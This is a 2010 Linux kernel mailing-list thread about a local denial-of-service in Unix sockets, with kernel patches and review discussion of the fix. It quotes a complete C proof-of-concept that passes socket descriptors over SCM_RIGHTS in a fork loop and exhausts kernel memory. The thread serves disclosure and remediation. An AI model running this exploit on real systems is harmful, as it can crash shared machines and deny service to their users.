* Re: Unix socket local DOS (OOM)
[not found] <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>
@ 2010-11-23 23:11 ` Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
` (2 more replies)
0 siblings, 3 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-23 23:11 UTC (permalink / raw)
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> Hi,
>
> I found this program lying around on my laptop. It kills my box
> (2.6.35) instantly by consuming a lot of memory (allocated by the
> kernel, so the process doesn't get killed by the OOM killer). As far
> as I can tell, the memory isn't being freed when the program exits
> either. Maybe it will eventually get cleaned up the UNIX socket
> garbage collector thing, but in that case it doesn't get called
> quickly enough to save my machine at least.
>
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <sys/wait.h>
>
> #include <errno.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> static int send_fd(int unix_fd, int fd)
> {
> struct msghdr msgh;
> struct cmsghdr *cmsg;
> char buf[CMSG_SPACE(sizeof(fd))];
>
> memset(&msgh, 0, sizeof(msgh));
>
> memset(buf, 0, sizeof(buf));
> msgh.msg_control = buf;
> msgh.msg_controllen = sizeof(buf);
>
> cmsg = CMSG_FIRSTHDR(&msgh);
> cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> cmsg->cmsg_level = SOL_SOCKET;
> cmsg->cmsg_type = SCM_RIGHTS;
>
> msgh.msg_controllen = cmsg->cmsg_len;
>
> memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> return sendmsg(unix_fd, &msgh, 0);
> }
>
> int main(int argc, char *argv[])
> {
> while (1) {
> pid_t child;
>
> child = fork();
> if (child == -1)
> exit(EXIT_FAILURE);
>
> if (child == 0) {
> int fd[2];
> int i;
>
> if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> goto out_error;
>
> for (i = 0; i < 100; ++i) {
> if (send_fd(fd[0], fd[0]) == -1)
> goto out_error;
>
> if (send_fd(fd[1], fd[1]) == -1)
> goto out_error;
> }
>
> close(fd[0]);
> close(fd[1]);
> goto out;
>
> out_error:
> fprintf(stderr, "error: %s\n", strerror(errno));
> out:
> exit(EXIT_SUCCESS);
> }
>
> while (1) {
> pid_t kid;
> int status;
>
> kid = wait(&status);
> if (kid == -1) {
> if (errno == ECHILD)
> break;
> if (errno == EINTR)
> continue;
>
> exit(EXIT_FAILURE);
> }
>
> if (WIFEXITED(status)) {
> if (WEXITSTATUS(status))
> exit(WEXITSTATUS(status));
> break;
> }
> }
> }
>
> return EXIT_SUCCESS;
> }
>
>
> Vegard
> --
Hi Vegard
Do you have a patch to correct this problem ?
I suppose we should add a machine wide limit of pending struct
scm_fp_list. (percpu_counter I guess)
David, commit f8d570a4 added one "struct list_head list;" to struct
scm_fp_list, enlarging it by a two factor because of power of two
kmalloc() sizes. (2048 bytes on 64bit arches instead of 1024
previously)
We might lower SCM_MAX_FD from 255 to 253 ?
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: Unix socket local DOS (OOM)
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
@ 2010-11-23 23:25 ` Vegard Nossum
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2 siblings, 0 replies; 12+ messages in thread
From: Vegard Nossum @ 2010-11-23 23:25 UTC (permalink / raw)
To: Eric Dumazet; +Cc: David Miller, LKML, Andrew Morton, Eugene Teo, netdev
On 24 November 2010 00:11, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
>> Hi,
>>
>> I found this program lying around on my laptop. It kills my box
>> (2.6.35) instantly by consuming a lot of memory (allocated by the
>> kernel, so the process doesn't get killed by the OOM killer). As far
>> as I can tell, the memory isn't being freed when the program exits
>> either. Maybe it will eventually get cleaned up the UNIX socket
>> garbage collector thing, but in that case it doesn't get called
>> quickly enough to save my machine at least.
>
> Hi Vegard
>
> Do you have a patch to correct this problem ?
No, sorry, I didn't look into it.
Vegard
^ permalink raw reply [flat|nested] 12+ messages in thread
* [PATCH net-next-2.6] scm: lower SCM_MAX_FD
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
@ 2010-11-24 0:09 ` Eric Dumazet
2010-11-24 19:17 ` David Miller
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2 siblings, 1 reply; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 0:09 UTC (permalink / raw)
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
> David, commit f8d570a4 added one "struct list_head list;" to struct
> scm_fp_list, enlarging it by a two factor because of power of two
> kmalloc() sizes. (2048 bytes on 64bit arches instead of 1024
> previously)
>
> We might lower SCM_MAX_FD from 255 to 253 ?
>
>
This wont correct Vegard reported problem yet, but following patch
should reduce ram usage a lot (32 bytes instead of 2048 bytes per scm in
Vegard test program)
Thanks
[PATCH net-next-2.6] net: scm: lower SCM_MAX_FD
Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
halved. (commit f8d570a4 added two pointers in this structure)
scm_fp_dup() should not copy whole structure (and trigger kmemcheck
warnings), but only the used part. While we are at it, only allocate
needed size.
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
---
include/net/scm.h | 5 +++--
net/core/scm.c | 10 ++++++----
2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/include/net/scm.h b/include/net/scm.h
index 3165650..745460f 100644
--- a/include/net/scm.h
+++ b/include/net/scm.h
@@ -10,11 +10,12 @@
/* Well, we should have at least one descriptor open
* to accept passed FDs 8)
*/
-#define SCM_MAX_FD 255
+#define SCM_MAX_FD 253
struct scm_fp_list {
struct list_head list;
- int count;
+ short count;
+ short max;
struct file *fp[SCM_MAX_FD];
};
diff --git a/net/core/scm.c b/net/core/scm.c
index 413cab8..bbe4544 100644
--- a/net/core/scm.c
+++ b/net/core/scm.c
@@ -79,10 +79,11 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
return -ENOMEM;
*fplp = fpl;
fpl->count = 0;
+ fpl->max = SCM_MAX_FD;
}
fpp = &fpl->fp[fpl->count];
- if (fpl->count + num > SCM_MAX_FD)
+ if (fpl->count + num > fpl->max)
return -EINVAL;
/*
@@ -331,11 +332,12 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
if (!fpl)
return NULL;
- new_fpl = kmalloc(sizeof(*fpl), GFP_KERNEL);
+ new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),
+ GFP_KERNEL);
if (new_fpl) {
- for (i=fpl->count-1; i>=0; i--)
+ for (i = 0; i < fpl->count; i++)
get_file(fpl->fp[i]);
- memcpy(new_fpl, fpl, sizeof(*fpl));
+ new_fpl->max = new_fpl->count;
}
return new_fpl;
}
^ permalink raw reply related [flat|nested] 12+ messages in thread
* [PATCH] af_unix: limit unix_tot_inflight
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24 9:18 ` Eric Dumazet
2010-11-24 14:44 ` Andi Kleen
2010-11-26 8:50 ` Michal Hocko
2 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 9:18 UTC (permalink / raw)
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
Le mercredi 24 novembre 2010 à 00:11 +0100, Eric Dumazet a écrit :
> Le mardi 23 novembre 2010 à 23:21 +0100, Vegard Nossum a écrit :
> > Hi,
> >
> > I found this program lying around on my laptop. It kills my box
> > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > kernel, so the process doesn't get killed by the OOM killer). As far
> > as I can tell, the memory isn't being freed when the program exits
> > either. Maybe it will eventually get cleaned up the UNIX socket
> > garbage collector thing, but in that case it doesn't get called
> > quickly enough to save my machine at least.
> >
> > #include <sys/mount.h>
> > #include <sys/socket.h>
> > #include <sys/un.h>
> > #include <sys/wait.h>
> >
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <unistd.h>
> >
> > static int send_fd(int unix_fd, int fd)
> > {
> > struct msghdr msgh;
> > struct cmsghdr *cmsg;
> > char buf[CMSG_SPACE(sizeof(fd))];
> >
> > memset(&msgh, 0, sizeof(msgh));
> >
> > memset(buf, 0, sizeof(buf));
> > msgh.msg_control = buf;
> > msgh.msg_controllen = sizeof(buf);
> >
> > cmsg = CMSG_FIRSTHDR(&msgh);
> > cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> > cmsg->cmsg_level = SOL_SOCKET;
> > cmsg->cmsg_type = SCM_RIGHTS;
> >
> > msgh.msg_controllen = cmsg->cmsg_len;
> >
> > memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> > return sendmsg(unix_fd, &msgh, 0);
> > }
> >
> > int main(int argc, char *argv[])
> > {
> > while (1) {
> > pid_t child;
> >
> > child = fork();
> > if (child == -1)
> > exit(EXIT_FAILURE);
> >
> > if (child == 0) {
> > int fd[2];
> > int i;
> >
> > if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> > goto out_error;
> >
> > for (i = 0; i < 100; ++i) {
> > if (send_fd(fd[0], fd[0]) == -1)
> > goto out_error;
> >
> > if (send_fd(fd[1], fd[1]) == -1)
> > goto out_error;
> > }
> >
> > close(fd[0]);
> > close(fd[1]);
> > goto out;
> >
> > out_error:
> > fprintf(stderr, "error: %s\n", strerror(errno));
> > out:
> > exit(EXIT_SUCCESS);
> > }
> >
> > while (1) {
> > pid_t kid;
> > int status;
> >
> > kid = wait(&status);
> > if (kid == -1) {
> > if (errno == ECHILD)
> > break;
> > if (errno == EINTR)
> > continue;
> >
> > exit(EXIT_FAILURE);
> > }
> >
> > if (WIFEXITED(status)) {
> > if (WEXITSTATUS(status))
> > exit(WEXITSTATUS(status));
> > break;
> > }
> > }
> > }
> >
> > return EXIT_SUCCESS;
> > }
> >
> >
> > Vegard
> > --
Here is a patch to address this problem.
Thanks
[PATCH] af_unix: limit unix_tot_inflight
Vegard Nossum found a unix socket OOM was possible, posting an exploit
program.
My analysis is we can eat all LOWMEM memory before unix_gc() being
called from unix_release_sock(). Moreover, the thread blocked in
unix_gc() can consume huge amount of time to perform cleanup because of
huge working set.
One way to handle this is to have a sensible limit on unix_tot_inflight,
tested from wait_for_unix_gc() and to force a call to unix_gc() if this
limit is hit.
This solves the OOM and also reduce overall latencies, and should not
slowdown normal workloads.
Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Eugene Teo <eugene@redhat.com>
---
net/unix/garbage.c | 7 +++++++
1 files changed, 7 insertions(+)
diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
}
static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 16000
void wait_for_unix_gc(void)
{
+ /*
+ * If number of inflight sockets is insane,
+ * force a garbage collect right now.
+ */
+ if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+ unix_gc();
wait_event(unix_gc_wait, gc_in_progress == false);
}
^ permalink raw reply related [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
@ 2010-11-24 14:44 ` Andi Kleen
2010-11-24 15:18 ` Eric Dumazet
2010-11-26 8:50 ` Michal Hocko
1 sibling, 1 reply; 12+ messages in thread
From: Andi Kleen @ 2010-11-24 14:44 UTC (permalink / raw)
To: Eric Dumazet
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev
Eric Dumazet <eric.dumazet@gmail.com> writes:
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> }
>
> static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
It would be better to define this as a percentage of
lowmem.
-Andi
--
ak@linux.intel.com -- Speaking for myself only.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 14:44 ` Andi Kleen
@ 2010-11-24 15:18 ` Eric Dumazet
2010-11-24 16:25 ` Andi Kleen
2010-11-24 17:14 ` David Miller
0 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 15:18 UTC (permalink / raw)
To: Andi Kleen
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev
Le mercredi 24 novembre 2010 à 15:44 +0100, Andi Kleen a écrit :
> Eric Dumazet <eric.dumazet@gmail.com> writes:
> >
> > diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> > index c8df6fd..40df93d 100644
> > --- a/net/unix/garbage.c
> > +++ b/net/unix/garbage.c
> > @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> > }
> >
> > static bool gc_in_progress = false;
> > +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>
> It would be better to define this as a percentage of
> lowmem.
>
I knew somebody would suggest this ;)
Hmm, why bother ?
Do you think 16000 is too big ? Too small ?
1) What would be the percentage of memory ? 1%, 0.001 % ?
On a 16TB machine, a percentage will still give huge latencies to the
poor guy that hit the unix_gc().
With 16000, the max latency I had was 11.5 ms (on an Intel E5540
@2.53GHz), instead of more than 2000 ms
I guess it would make more sense to limit to the size of cpu cache
anyway.
2) We currently allocate 4096 bytes (on x86_64) to store one file
pointer, or 2048 bytes on x86_32.
But we can store in it up to 255 files.
I posted a patch to shrink this to 32 or 16 bytes. Should we then
change the heuristic ?
3) Really who needs more than 16000 inflight unix files ?
(inflight unix files means : af_unix file descriptors that were sent
(sendfd()) through af_unix, not yet garbage collected.).
4) If we autotune a limit at boot time as a lowmem percentage, some guys
then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
completeness. One extra sysctl...
I cant see valid uses but programs designed to stress our stack.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 15:18 ` Eric Dumazet
@ 2010-11-24 16:25 ` Andi Kleen
2010-11-24 17:14 ` David Miller
1 sibling, 0 replies; 12+ messages in thread
From: Andi Kleen @ 2010-11-24 16:25 UTC (permalink / raw)
To: Eric Dumazet
Cc: Andi Kleen, Vegard Nossum, David Miller, LKML, Andrew Morton,
Eugene Teo, netdev
> I knew somebody would suggest this ;)
>
> Hmm, why bother ?
>
> Do you think 16000 is too big ? Too small ?
I just don't like static limits. Traditionally even the ones
that seemed reasonable at some point were hit by someone
years later.
The latency issue you mention is a valid concern. I guess
an incremental GC would be overkill here ...
-Andi
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 15:18 ` Eric Dumazet
2010-11-24 16:25 ` Andi Kleen
@ 2010-11-24 17:14 ` David Miller
1 sibling, 0 replies; 12+ messages in thread
From: David Miller @ 2010-11-24 17:14 UTC (permalink / raw)
To: eric.dumazet; +Cc: andi, vegard.nossum, linux-kernel, akpm, eugene, netdev
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 16:18:26 +0100
> 4) If we autotune a limit at boot time as a lowmem percentage, some guys
> then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
> completeness. One extra sysctl...
>
> I cant see valid uses but programs designed to stress our stack.
I agree completely with Eric's analysis.
I would even consider setting this threshold lower. :-)
Anyways, consider Eric's patch applied.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH net-next-2.6] scm: lower SCM_MAX_FD
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24 19:17 ` David Miller
0 siblings, 0 replies; 12+ messages in thread
From: David Miller @ 2010-11-24 19:17 UTC (permalink / raw)
To: eric.dumazet; +Cc: vegard.nossum, linux-kernel, akpm, eugene, netdev
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 01:09:15 +0100
> [PATCH net-next-2.6] net: scm: lower SCM_MAX_FD
>
> Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
> halved. (commit f8d570a4 added two pointers in this structure)
>
> scm_fp_dup() should not copy whole structure (and trigger kmemcheck
> warnings), but only the used part. While we are at it, only allocate
> needed size.
>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Also applied, thanks Eric.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44 ` Andi Kleen
@ 2010-11-26 8:50 ` Michal Hocko
2010-11-27 2:27 ` David Miller
1 sibling, 1 reply; 12+ messages in thread
From: Michal Hocko @ 2010-11-26 8:50 UTC (permalink / raw)
To: stable
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev, Eric Dumazet
Shouldn't this go to stable?
AFAICS 2.6.32 contains the same code (the patch applies).
I haven't tried to reproduce the issue yet.
On Wed 24-11-10 10:18:55, Eric Dumazet wrote:
> Le mercredi 24 novembre 2010 ?? 00:11 +0100, Eric Dumazet a ??crit :
> > Le mardi 23 novembre 2010 ?? 23:21 +0100, Vegard Nossum a ??crit :
> > > Hi,
> > >
> > > I found this program lying around on my laptop. It kills my box
> > > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > > kernel, so the process doesn't get killed by the OOM killer). As far
> > > as I can tell, the memory isn't being freed when the program exits
> > > either. Maybe it will eventually get cleaned up the UNIX socket
> > > garbage collector thing, but in that case it doesn't get called
> > > quickly enough to save my machine at least.
> > >
> > > #include <sys/mount.h>
> > > #include <sys/socket.h>
> > > #include <sys/un.h>
> > > #include <sys/wait.h>
> > >
> > > #include <errno.h>
> > > #include <fcntl.h>
> > > #include <stdio.h>
> > > #include <stdlib.h>
> > > #include <string.h>
> > > #include <unistd.h>
> > >
> > > static int send_fd(int unix_fd, int fd)
> > > {
> > > struct msghdr msgh;
> > > struct cmsghdr *cmsg;
> > > char buf[CMSG_SPACE(sizeof(fd))];
> > >
> > > memset(&msgh, 0, sizeof(msgh));
> > >
> > > memset(buf, 0, sizeof(buf));
> > > msgh.msg_control = buf;
> > > msgh.msg_controllen = sizeof(buf);
> > >
> > > cmsg = CMSG_FIRSTHDR(&msgh);
> > > cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> > > cmsg->cmsg_level = SOL_SOCKET;
> > > cmsg->cmsg_type = SCM_RIGHTS;
> > >
> > > msgh.msg_controllen = cmsg->cmsg_len;
> > >
> > > memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> > > return sendmsg(unix_fd, &msgh, 0);
> > > }
> > >
> > > int main(int argc, char *argv[])
> > > {
> > > while (1) {
> > > pid_t child;
> > >
> > > child = fork();
> > > if (child == -1)
> > > exit(EXIT_FAILURE);
> > >
> > > if (child == 0) {
> > > int fd[2];
> > > int i;
> > >
> > > if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> > > goto out_error;
> > >
> > > for (i = 0; i < 100; ++i) {
> > > if (send_fd(fd[0], fd[0]) == -1)
> > > goto out_error;
> > >
> > > if (send_fd(fd[1], fd[1]) == -1)
> > > goto out_error;
> > > }
> > >
> > > close(fd[0]);
> > > close(fd[1]);
> > > goto out;
> > >
> > > out_error:
> > > fprintf(stderr, "error: %s\n", strerror(errno));
> > > out:
> > > exit(EXIT_SUCCESS);
> > > }
> > >
> > > while (1) {
> > > pid_t kid;
> > > int status;
> > >
> > > kid = wait(&status);
> > > if (kid == -1) {
> > > if (errno == ECHILD)
> > > break;
> > > if (errno == EINTR)
> > > continue;
> > >
> > > exit(EXIT_FAILURE);
> > > }
> > >
> > > if (WIFEXITED(status)) {
> > > if (WEXITSTATUS(status))
> > > exit(WEXITSTATUS(status));
> > > break;
> > > }
> > > }
> > > }
> > >
> > > return EXIT_SUCCESS;
> > > }
> > >
> > >
> > > Vegard
> > > --
>
> Here is a patch to address this problem.
>
> Thanks
>
> [PATCH] af_unix: limit unix_tot_inflight
>
> Vegard Nossum found a unix socket OOM was possible, posting an exploit
> program.
>
> My analysis is we can eat all LOWMEM memory before unix_gc() being
> called from unix_release_sock(). Moreover, the thread blocked in
> unix_gc() can consume huge amount of time to perform cleanup because of
> huge working set.
>
> One way to handle this is to have a sensible limit on unix_tot_inflight,
> tested from wait_for_unix_gc() and to force a call to unix_gc() if this
> limit is hit.
>
> This solves the OOM and also reduce overall latencies, and should not
> slowdown normal workloads.
>
> Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
> Cc: Andrew Morton <akpm@linux-foundation.org>
> Cc: Eugene Teo <eugene@redhat.com>
> ---
> net/unix/garbage.c | 7 +++++++
> 1 files changed, 7 insertions(+)
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> }
>
> static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>
> void wait_for_unix_gc(void)
> {
> + /*
> + * If number of inflight sockets is insane,
> + * force a garbage collect right now.
> + */
> + if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
> + unix_gc();
> wait_event(unix_gc_wait, gc_in_progress == false);
> }
>
>
>
> --
> To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at http://vger.kernel.org/majordomo-info.html
> Please read the FAQ at http://www.tux.org/lkml/
--
Michal Hocko
L3 team
SUSE LINUX s.r.o.
Lihovarska 1060/12
190 00 Praha 9
Czech Republic
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-26 8:50 ` Michal Hocko
@ 2010-11-27 2:27 ` David Miller
2010-11-29 10:37 ` Michal Hocko
0 siblings, 1 reply; 12+ messages in thread
From: David Miller @ 2010-11-27 2:27 UTC (permalink / raw)
To: mhocko
Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev,
eric.dumazet
From: Michal Hocko <mhocko@suse.cz>
Date: Fri, 26 Nov 2010 09:50:00 +0100
> Shouldn't this go to stable?
> AFAICS 2.6.32 contains the same code (the patch applies).
> I haven't tried to reproduce the issue yet.
I'll submit it to all the stable branches after this patch (and the
other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
least half a week or so.
^ permalink raw reply [flat|nested] 12+ messages in thread
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-27 2:27 ` David Miller
@ 2010-11-29 10:37 ` Michal Hocko
0 siblings, 0 replies; 12+ messages in thread
From: Michal Hocko @ 2010-11-29 10:37 UTC (permalink / raw)
To: David Miller
Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev,
eric.dumazet
On Fri 26-11-10 18:27:14, David Miller wrote:
> From: Michal Hocko <mhocko@suse.cz>
> Date: Fri, 26 Nov 2010 09:50:00 +0100
>
> > Shouldn't this go to stable?
> > AFAICS 2.6.32 contains the same code (the patch applies).
> > I haven't tried to reproduce the issue yet.
>
> I'll submit it to all the stable branches after this patch (and the
> other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
> least half a week or so.
OK, thanks!
--
Michal Hocko
L3 team
SUSE LINUX s.r.o.
Lihovarska 1060/12
190 00 Praha 9
Czech Republic
^ permalink raw reply [flat|nested] 12+ messages in thread
end of thread, other threads:[~2010-11-29 10:37 UTC | newest]
Thread overview: 12+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
[not found] <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 19:17 ` David Miller
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44 ` Andi Kleen
2010-11-24 15:18 ` Eric Dumazet
2010-11-24 16:25 ` Andi Kleen
2010-11-24 17:14 ` David Miller
2010-11-26 8:50 ` Michal Hocko
2010-11-27 2:27 ` David Miller
2010-11-29 10:37 ` Michal Hocko
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).